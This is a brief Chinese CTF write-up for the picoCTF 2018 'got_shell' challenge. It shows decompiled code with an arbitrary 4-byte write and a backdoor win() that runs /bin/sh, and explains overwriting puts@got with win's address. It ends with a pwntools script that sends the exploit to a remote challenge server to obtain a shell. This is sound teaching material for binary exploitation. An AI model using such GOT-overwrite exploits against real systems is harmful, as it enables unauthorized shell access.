picoctf_2018_got_shell

picoctf_2018_got_shell

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位，只开了NX

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{_DWORD *v3; // [esp+14h] [ebp-114h]int v4; // [esp+18h] [ebp-110h]char s; // [esp+1Ch] [ebp-10Ch]unsigned int v6; // [esp+11Ch] [ebp-Ch]v6 = __readgsdword(0x14u);setvbuf(_bss_start, 0, 2, 0);puts("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?");__isoc99_scanf("%x", &v3);sprintf(&s, "Okay, now what value would you like to write to 0x%x", v3);puts(&s);__isoc99_scanf("%x", &v4);sprintf(&s, "Okay, writing 0x%x to 0x%x", v4, v3);puts(&s);*v3 = v4;puts("Okay, exiting now...\n");exit(1);
}

int win()
{return system("/bin/sh");
}

有后门函数，并且主函数，是更改地址的程序

思路

最后有使用puts，(或者改exit都可以)，更改puts@got–>win函数即可

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",29972,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')sla(b'byte value?',hex(elf.got['puts']))
sla(b'like to write to',b'0x804854B')ia()